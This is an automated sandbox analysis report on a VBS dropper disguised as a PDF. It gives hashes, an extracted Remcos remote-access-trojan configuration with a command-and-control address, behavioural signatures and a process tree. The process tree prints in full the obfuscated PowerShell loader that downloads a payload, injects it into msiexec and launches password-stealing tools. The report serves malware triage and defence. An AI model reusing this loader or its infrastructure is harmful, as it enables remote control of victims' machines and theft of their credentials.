Overview

overview

10

Static

static

1

CI+PL_pdf.vbs

windows7-x64

10

CI+PL_pdf.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    297s
  • max time network
    271s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-10-2024 01:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CI+PL_pdf.vbs

  • Size

    10KB

  • MD5

    be47cb340cb887096ab69a01c4780227

  • SHA1

    8688904892b6f732ef8df362ad5d0b810de337d0

  • SHA256

    a459a81129cae256a1da0ec67918dbca56d91e95eb26b11bdac7f0c2a82580ec

  • SHA512

    3795692900b0f98be8ca11768446e21b5dae034b43645df3f6388273dea0de4cbbe78a36c56e085b40074ebdf7d5909e511106445527ae509c828be13d001e84

  • SSDEEP

    192:xiJSEyChBpc9D1smsU1VmCIX62aTf3RRBqwBoBVao8jmgwgKBrD:xu1BIRsmsU1Vmu1R8wwgOrD

Score
10/10
remcosremotehostcollectiondiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.18.214:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-AOD6MB

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CI+PL_pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Deklameringerne Lodde Totalitarismen Counterphobic Bronchiocele #>;$Riffelgangens12='Cloudlet';<#Dumpede Markedsanalysens Teknokratiserer Gruppemedlemmerne Forflygtigede #>;$Gigabyter81ndeterminancy=$Hutukhtu103+$host.UI;function Betingelsesbindeordet($Hmoglobin){If ($Gigabyter81ndeterminancy) {$quechuan++;}$Baklygte=$Facilitates+$Hmoglobin.'Length'-$quechuan; for( $Gigabyter81=3;$Gigabyter81 -lt $Baklygte;$Gigabyter81+=4){$Programafprvning++;$Lative+=$Hmoglobin[$Gigabyter81];$Deputations='Brugsgaardes';}$Lative;}function Plderet($Posthypophysis){ & ($Clothespins) ($Posthypophysis);}$Eksamensrsenes=Betingelsesbindeordet 'UnwM FdoBe,zPrei s lIndlCo aFel/F s ';$Eksamensrsenes+=Betingelsesbindeordet 'Beh5 Ex.Rep0Gla sam(EnsWCogiHusnscld AeoL,nwDemsPit UdbN icT,yr Unm1F.e0Com. Un0Whi;,er aWMinimysnD s6Int4Ind;Tim ,umxUdl6Hav4Eel; yp PhyrForv.wi:s a1.ra3sam1.no. Fe0Tel) os PetGMegema c BlkLkkoHel/Typ2Red0M f1Dom0stu0 su1 e0bur1Emi E FsymiVurrhaeesorfQuio.umxI b/ D 1 No3,og1Kai. un0 o ';$Folkemindesamleres=Betingelsesbindeordet ' B UCris ie.muRsed-PomACapgArcEEp nFo tspa ';$Rattleskull=Betingelsesbindeordet 'deshgoltGeotJrgpgav:mal/ as/Ta,hPro2Po.z,olqEft. H sEmbhDaaoLovpBob/ onvLi.k dekNeofMedx Kej Coz UndOv,/sorAPenrKa rUdkaHulntiptFaglOpeyAmt.F rd efs lep Ko ';$substitutability=Betingelsesbindeordet ' so>Uns ';$Clothespins=Betingelsesbindeordet 'B ti IneFerxBra ';$Bamseklubben249='Giddies';$Rehearsable='\steamie.Non';Plderet (Betingelsesbindeordet 'skj$De GoveL TroCavbAneAArvl is:stuP floDaqLstaiKr.t D.iscoRsusaObsP,hap oroHooRspoT st=Ram$AffeTasn agvA c:PoiacraPKriPGepdscrarygTKniaDes+Cad$shor GsEMidh ,eE mA rr ,bs onA Rhb.idLCyneC e ');Plderet (Betingelsesbindeordet 'Luk$skoG shL InO AnBFa aHirlDeo: TikBliUEuslTaotDetu T r scc P e UsNFortKseRm nEUnisInc=Fan$HidRDuea HrTNattspaLPuneBrysKalkDa.UTe l aL V .,sys ltPIndlBagi V tHy.( ,e$KonsMatuZooB AlsoveTPiri ritDalUHofTWora slBAf iFellAmpiPattstoy Ch),ok ');Plderet (Betingelsesbindeordet 'Int[F.dNRece thTOve.Mals,laE Cor T VFr IskaCKuneFo.p aloka.i D NB,rTdism rmaG nNTjeAshaGAnaEUn,r P ]Qu.: en:Outs anEshocGoluT,bRC nIBr t ueYmowPC nR UrOChatGraOOffCErnoCheLsuc V l= Ba Obl[ rNUn eDksTAve.salsPaaEN nCReeuNo.R U IParTstayKonpFarr CuoLomt odOYarCFyroHumLFl tH aY Fup TeeGas] en:Fre:ModTUnrlTutsQrg1K.n2 em ');$Rattleskull=$Kulturcentres[0];$Anadesm=(Betingelsesbindeordet 'Rec$Camg DelJumOFilBO ta BeLDo,:KinzstuO teN ouEBy L N o epvsupsMerTBruiArbLAsplst A lDInsETruLRins EjeRedR EksL n=F tnG veU,sWRe - U ostrbCoaJNone Kac oTleu s.isArbYMissVolT AdeFugmUnm.sfoN,ole GoTLnt.J.vW.ykEAveBHouCApoLIrrikorERieNReptMol ');Plderet ($Anadesm);Plderet (Betingelsesbindeordet 'Fo,$EftZ FuoJubn Ine ulsnyostovRhesskytAf i .dls ml Gua BidP reBoilDr sCe eUdbr mosdam. ArHs,reFraaEksd UneLanrF rs Ju[Cy.$ BiFBoioseklAn,kBlaesu mPini PrnAerdCeceMelsPliaCapmTrolColeGymrPuteUg,sUnd]Bak=B.g$ TiEBulkM,sss lasn,mseme rinOvesB trPrusPareFran sqeDansBea ');$Astroglia=Betingelsesbindeordet 'ref$CemZsh o ,rnOveesenlUn oUmavFlysMort EuiEl.lP.olAmya .yd saeFanladjs ineTyprTers F .NonD .eo tyw,ain Pulmodo mpaMumdHicFMoniPl,l .ne.ec( ir$ HoRUslacrotDozt OplBareDobsR.mk NouDielKallBoo,Kde$ oLdu.aRefnMumcImpesydrPoheUdedRkkeAff)hag ';$Lancerede=$Politirapport;Plderet (Betingelsesbindeordet ' He$PeaGDriLErhoBalbKo A.ntL Ve:UdbJU vEU aR PoNVkss vvbR,sEAf sBetLData TbGMil=Aq,(A,ttBaheBe sB,tt Bo-,elPIs ADevt AnhFor For$BanlstoaParNH.sCMenEskiRElueVedDproe ,n) C ');while (!$Jernsbeslag) {Plderet (Betingelsesbindeordet ' Kv$VolgBe.lR.co Opb ataLavlKa :,onssuctsatrAanoFormcodaUdftL miF,ncHas2Far4 sl8.nm= sa$ matbr r l uOldeRom ') ;Plderet $Astroglia;Plderet (Betingelsesbindeordet 'N tsToaT Ava UnR AfT .n- sas,ftLTameMarEUdePsup k,a4 a ');Plderet (Betingelsesbindeordet 'Pte$r bgsatLVoloCo bBenAR aLPre:coujspoECrersodNCh sNo.B she NossheLKlaaE lgKas= A (Ov tGoreGens Frt ,g-,roP aaProTmrkhCer .u$VarlBunADefNGulc.njEsupRBorELarDTypeUnp) Ud ') ;Plderet (Betingelsesbindeordet ' sj$,anGFlulkeno ebIleAAckLsub:Fo,Tstea.etl ae leNPanTOutf amusnels rd,geeRrhs GeTpe.eCom1 ym5Gl.6syd=sai$Fi GCarL Foo M.B FlAra.L H : U.skartM rYR,dpsp sstuIKrfsTokE DisDet+Lat+ or%Kal$u lk I usmaLKauTtjtURetR shcR,bEVarnPrnt veRRe eBulsWil.Fa C AmO AsUBacnHo Tska ') ;$Rattleskull=$Kulturcentres[$Talentfuldeste156];}$Pastoralization=326374;$supercoincidence=28847;Plderet (Betingelsesbindeordet ',as$UndG eL s oFrdB fta ahlRat:Li.aMa CneiePlaTs naBerTslasP oIVallsolkslgE.taN v on= He K wGsvoeKa tOps- Pac AkosupnR sT,ndeWeeNKamt.nb Tra$Gy l.dsaFacN D C I E hoRAm E UndDateH l ');Plderet (Betingelsesbindeordet 'Mo $ H,gsynlArcoRocbIrraPaal s,:OveEBatn ChlperaI,fcwiteCirm nde E nDout sa Unm= Uv Taw[Piasskay Udse.tt Tee CumVis. HiC B,o Urn Atvsawe.alrHe,tsu ] sy:Kod:RigFGymrsido ,tmsalBF caWars Lae ,l6s r4CursPartTl,rkoniCocnsulgOst( Re$AntACerc .ie EntReaa fet EksCoai L l Phk stedksn,ar)Ras ');Plderet (Betingelsesbindeordet 'Ono$ComGst.LT.gosteBPo a uL T.:LynoKriuUncTOu r uOUdfa ecdB n .t=.en Ene[E.dsBenyEpisA gtBane amT a.upsTC peKasxBevtT.y. ndEN cNR.pCMicOCerdsj IR tn omGChl]Kon:Dia:PetastrsAdvCRetI UnIGy..K,rg ndEMi,T A sFo.tstir CaIBilnPolGAbo(Fun$ ,oesexNGumlHovA HacDecENicMsanesysNUn.TQu ) s ');Plderet (Betingelsesbindeordet 'Ta,$WeigFraL aOLavbsiga AfLLre: FoEChenOptdElaORatK ReR RaIAv,N frtUnv= as$OpsoAnsUVoktPharCorost.aMorDRea.Pa sspaUDifB MosGrotA,vr evIsprns ygst (For$OveP viA Z s.ortBloosniRFarAGgeLPariskiZFukapolTMeaIsliOBa nMu ,coo$.wesA cuKarPskaeNonrRencTaaoBl.i Ayn MacLaeiCard AlENe nLr.cPuaE en)No ');Plderet $Endokrint;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1448
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Deklameringerne Lodde Totalitarismen Counterphobic Bronchiocele #>;$Riffelgangens12='Cloudlet';<#Dumpede Markedsanalysens Teknokratiserer Gruppemedlemmerne Forflygtigede #>;$Gigabyter81ndeterminancy=$Hutukhtu103+$host.UI;function Betingelsesbindeordet($Hmoglobin){If ($Gigabyter81ndeterminancy) {$quechuan++;}$Baklygte=$Facilitates+$Hmoglobin.'Length'-$quechuan; for( $Gigabyter81=3;$Gigabyter81 -lt $Baklygte;$Gigabyter81+=4){$Programafprvning++;$Lative+=$Hmoglobin[$Gigabyter81];$Deputations='Brugsgaardes';}$Lative;}function Plderet($Posthypophysis){ & ($Clothespins) ($Posthypophysis);}$Eksamensrsenes=Betingelsesbindeordet 'UnwM FdoBe,zPrei s lIndlCo aFel/F s ';$Eksamensrsenes+=Betingelsesbindeordet 'Beh5 Ex.Rep0Gla sam(EnsWCogiHusnscld AeoL,nwDemsPit UdbN icT,yr Unm1F.e0Com. Un0Whi;,er aWMinimysnD s6Int4Ind;Tim ,umxUdl6Hav4Eel; yp PhyrForv.wi:s a1.ra3sam1.no. Fe0Tel) os PetGMegema c BlkLkkoHel/Typ2Red0M f1Dom0stu0 su1 e0bur1Emi E FsymiVurrhaeesorfQuio.umxI b/ D 1 No3,og1Kai. un0 o ';$Folkemindesamleres=Betingelsesbindeordet ' B UCris ie.muRsed-PomACapgArcEEp nFo tspa ';$Rattleskull=Betingelsesbindeordet 'deshgoltGeotJrgpgav:mal/ as/Ta,hPro2Po.z,olqEft. H sEmbhDaaoLovpBob/ onvLi.k dekNeofMedx Kej Coz UndOv,/sorAPenrKa rUdkaHulntiptFaglOpeyAmt.F rd efs lep Ko ';$substitutability=Betingelsesbindeordet ' so>Uns ';$Clothespins=Betingelsesbindeordet 'B ti IneFerxBra ';$Bamseklubben249='Giddies';$Rehearsable='\steamie.Non';Plderet (Betingelsesbindeordet 'skj$De GoveL TroCavbAneAArvl is:stuP floDaqLstaiKr.t D.iscoRsusaObsP,hap oroHooRspoT st=Ram$AffeTasn agvA c:PoiacraPKriPGepdscrarygTKniaDes+Cad$shor GsEMidh ,eE mA rr ,bs onA Rhb.idLCyneC e ');Plderet (Betingelsesbindeordet 'Luk$skoG shL InO AnBFa aHirlDeo: TikBliUEuslTaotDetu T r scc P e UsNFortKseRm nEUnisInc=Fan$HidRDuea HrTNattspaLPuneBrysKalkDa.UTe l aL V .,sys ltPIndlBagi V tHy.( ,e$KonsMatuZooB AlsoveTPiri ritDalUHofTWora slBAf iFellAmpiPattstoy Ch),ok ');Plderet (Betingelsesbindeordet 'Int[F.dNRece thTOve.Mals,laE Cor T VFr IskaCKuneFo.p aloka.i D NB,rTdism rmaG nNTjeAshaGAnaEUn,r P ]Qu.: en:Outs anEshocGoluT,bRC nIBr t ueYmowPC nR UrOChatGraOOffCErnoCheLsuc V l= Ba Obl[ rNUn eDksTAve.salsPaaEN nCReeuNo.R U IParTstayKonpFarr CuoLomt odOYarCFyroHumLFl tH aY Fup TeeGas] en:Fre:ModTUnrlTutsQrg1K.n2 em ');$Rattleskull=$Kulturcentres[0];$Anadesm=(Betingelsesbindeordet 'Rec$Camg DelJumOFilBO ta BeLDo,:KinzstuO teN ouEBy L N o epvsupsMerTBruiArbLAsplst A lDInsETruLRins EjeRedR EksL n=F tnG veU,sWRe - U ostrbCoaJNone Kac oTleu s.isArbYMissVolT AdeFugmUnm.sfoN,ole GoTLnt.J.vW.ykEAveBHouCApoLIrrikorERieNReptMol ');Plderet ($Anadesm);Plderet (Betingelsesbindeordet 'Fo,$EftZ FuoJubn Ine ulsnyostovRhesskytAf i .dls ml Gua BidP reBoilDr sCe eUdbr mosdam. ArHs,reFraaEksd UneLanrF rs Ju[Cy.$ BiFBoioseklAn,kBlaesu mPini PrnAerdCeceMelsPliaCapmTrolColeGymrPuteUg,sUnd]Bak=B.g$ TiEBulkM,sss lasn,mseme rinOvesB trPrusPareFran sqeDansBea ');$Astroglia=Betingelsesbindeordet 'ref$CemZsh o ,rnOveesenlUn oUmavFlysMort EuiEl.lP.olAmya .yd saeFanladjs ineTyprTers F .NonD .eo tyw,ain Pulmodo mpaMumdHicFMoniPl,l .ne.ec( ir$ HoRUslacrotDozt OplBareDobsR.mk NouDielKallBoo,Kde$ oLdu.aRefnMumcImpesydrPoheUdedRkkeAff)hag ';$Lancerede=$Politirapport;Plderet (Betingelsesbindeordet ' He$PeaGDriLErhoBalbKo A.ntL Ve:UdbJU vEU aR PoNVkss vvbR,sEAf sBetLData TbGMil=Aq,(A,ttBaheBe sB,tt Bo-,elPIs ADevt AnhFor For$BanlstoaParNH.sCMenEskiRElueVedDproe ,n) C ');while (!$Jernsbeslag) {Plderet (Betingelsesbindeordet ' Kv$VolgBe.lR.co Opb ataLavlKa :,onssuctsatrAanoFormcodaUdftL miF,ncHas2Far4 sl8.nm= sa$ matbr r l uOldeRom ') ;Plderet $Astroglia;Plderet (Betingelsesbindeordet 'N tsToaT Ava UnR AfT .n- sas,ftLTameMarEUdePsup k,a4 a ');Plderet (Betingelsesbindeordet 'Pte$r bgsatLVoloCo bBenAR aLPre:coujspoECrersodNCh sNo.B she NossheLKlaaE lgKas= A (Ov tGoreGens Frt ,g-,roP aaProTmrkhCer .u$VarlBunADefNGulc.njEsupRBorELarDTypeUnp) Ud ') ;Plderet (Betingelsesbindeordet ' sj$,anGFlulkeno ebIleAAckLsub:Fo,Tstea.etl ae leNPanTOutf amusnels rd,geeRrhs GeTpe.eCom1 ym5Gl.6syd=sai$Fi GCarL Foo M.B FlAra.L H : U.skartM rYR,dpsp sstuIKrfsTokE DisDet+Lat+ or%Kal$u lk I usmaLKauTtjtURetR shcR,bEVarnPrnt veRRe eBulsWil.Fa C AmO AsUBacnHo Tska ') ;$Rattleskull=$Kulturcentres[$Talentfuldeste156];}$Pastoralization=326374;$supercoincidence=28847;Plderet (Betingelsesbindeordet ',as$UndG eL s oFrdB fta ahlRat:Li.aMa CneiePlaTs naBerTslasP oIVallsolkslgE.taN v on= He K wGsvoeKa tOps- Pac AkosupnR sT,ndeWeeNKamt.nb Tra$Gy l.dsaFacN D C I E hoRAm E UndDateH l ');Plderet (Betingelsesbindeordet 'Mo $ H,gsynlArcoRocbIrraPaal s,:OveEBatn ChlperaI,fcwiteCirm nde E nDout sa Unm= Uv Taw[Piasskay Udse.tt Tee CumVis. HiC B,o Urn Atvsawe.alrHe,tsu ] sy:Kod:RigFGymrsido ,tmsalBF caWars Lae ,l6s r4CursPartTl,rkoniCocnsulgOst( Re$AntACerc .ie EntReaa fet EksCoai L l Phk stedksn,ar)Ras ');Plderet (Betingelsesbindeordet 'Ono$ComGst.LT.gosteBPo a uL T.:LynoKriuUncTOu r uOUdfa ecdB n .t=.en Ene[E.dsBenyEpisA gtBane amT a.upsTC peKasxBevtT.y. ndEN cNR.pCMicOCerdsj IR tn omGChl]Kon:Dia:PetastrsAdvCRetI UnIGy..K,rg ndEMi,T A sFo.tstir CaIBilnPolGAbo(Fun$ ,oesexNGumlHovA HacDecENicMsanesysNUn.TQu ) s ');Plderet (Betingelsesbindeordet 'Ta,$WeigFraL aOLavbsiga AfLLre: FoEChenOptdElaORatK ReR RaIAv,N frtUnv= as$OpsoAnsUVoktPharCorost.aMorDRea.Pa sspaUDifB MosGrotA,vr evIsprns ygst (For$OveP viA Z s.ortBloosniRFarAGgeLPariskiZFukapolTMeaIsliOBa nMu ,coo$.wesA cuKarPskaeNonrRencTaaoBl.i Ayn MacLaeiCard AlENe nLr.cPuaE en)No ');Plderet $Endokrint;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1636
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4024
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qcawuxiptiwmpqowtgknhnckypjyxdbvv"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4520
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bwfpn"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:644
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lztaniek"
        3⤵
          PID:5116
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lztaniek"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1640

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      d336b18e0e02e045650ac4f24c7ecaa7

      SHA1

      87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

      SHA256

      87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

      SHA512

      e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wexdih5f.wtf.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\qcawuxiptiwmpqowtgknhnckypjyxdbvv
      Filesize

      4KB

      MD5

      7aca43b2800ceb18b3ed2326532545de

      SHA1

      d4cf207ef85bd749d59c1cb27a09c167ee21523a

      SHA256

      3d9f8622d97587fd84d3d0560a50ab38e5f894fe4b5bcaa34279643fdaaeb480

      SHA512

      0e002e6b8d965c227d9b1aa7c0251619c787ec7717e59667e756e5815e3666a955ea397eb148a1ed6bb7d8045727e4efa656a103f14bc70a03b03f0c91283c2f

      Download Submit

    • C:\Users\Admin\AppData\Roaming\steamie.Non
      Filesize

      462KB

      MD5

      dee52a1c145167c55fe513ff006d3768

      SHA1

      6f9ccd885145de403d5e91a458cec7d36b4da7e2

      SHA256

      4b5eb0b6877f4804a3c2c9629493f3d1c68b02730d81055ed1139113337c6284

      SHA512

      ec44c6ab4623cc16479c507ead3e5b90119f49670f56997a4f70329003703a9c74c804ebecfd50bf07c0dee2c6399708df5a7550dc27baeb5699980eb6c5a3af

      Download Submit

    • memory/644-55-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/644-51-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/644-56-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/1448-1-0x000002307C870000-0x000002307C892000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1448-12-0x00007FF82B840000-0x00007FF82C301000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1448-15-0x00007FF82B840000-0x00007FF82C301000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1448-16-0x00007FF82B840000-0x00007FF82C301000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1448-19-0x00007FF82B840000-0x00007FF82C301000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1448-11-0x00007FF82B840000-0x00007FF82C301000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1448-0-0x00007FF82B843000-0x00007FF82B845000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1636-22-0x0000000005960000-0x0000000005982000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1636-23-0x0000000006040000-0x00000000060A6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1636-24-0x0000000006120000-0x0000000006186000-memory.dmp

      Filesize

      408KB

      Download

    • memory/1636-34-0x0000000006210000-0x0000000006564000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1636-36-0x0000000006830000-0x000000000684E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1636-37-0x0000000006D70000-0x0000000006DBC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/1636-38-0x0000000008080000-0x00000000086FA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/1636-39-0x0000000006DE0000-0x0000000006DFA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/1636-40-0x0000000007AA0000-0x0000000007B36000-memory.dmp

      Filesize

      600KB

      Download

    • memory/1636-41-0x0000000007A40000-0x0000000007A62000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1636-42-0x0000000008CB0000-0x0000000009254000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1636-44-0x0000000009260000-0x000000000D8B8000-memory.dmp

      Filesize

      70.3MB

      Download

    • memory/1636-21-0x0000000005A10000-0x0000000006038000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/1636-20-0x0000000005260000-0x0000000005296000-memory.dmp

      Filesize

      216KB

      Download

    • memory/1640-58-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/1640-59-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/1640-60-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/4024-75-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-64-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-77-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-97-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-78-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-46-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-67-0x0000000021B20000-0x0000000021B39000-memory.dmp

      Filesize

      100KB

      Download

    • memory/4024-70-0x0000000021B20000-0x0000000021B39000-memory.dmp

      Filesize

      100KB

      Download

    • memory/4024-71-0x0000000021B20000-0x0000000021B39000-memory.dmp

      Filesize

      100KB

      Download

    • memory/4024-72-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-73-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-79-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-96-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-76-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-95-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-94-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-74-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-83-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-84-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-85-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-86-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-87-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-88-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-92-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4024-93-0x0000000000AE0000-0x0000000001D34000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4520-57-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4520-54-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4520-53-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/4520-50-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download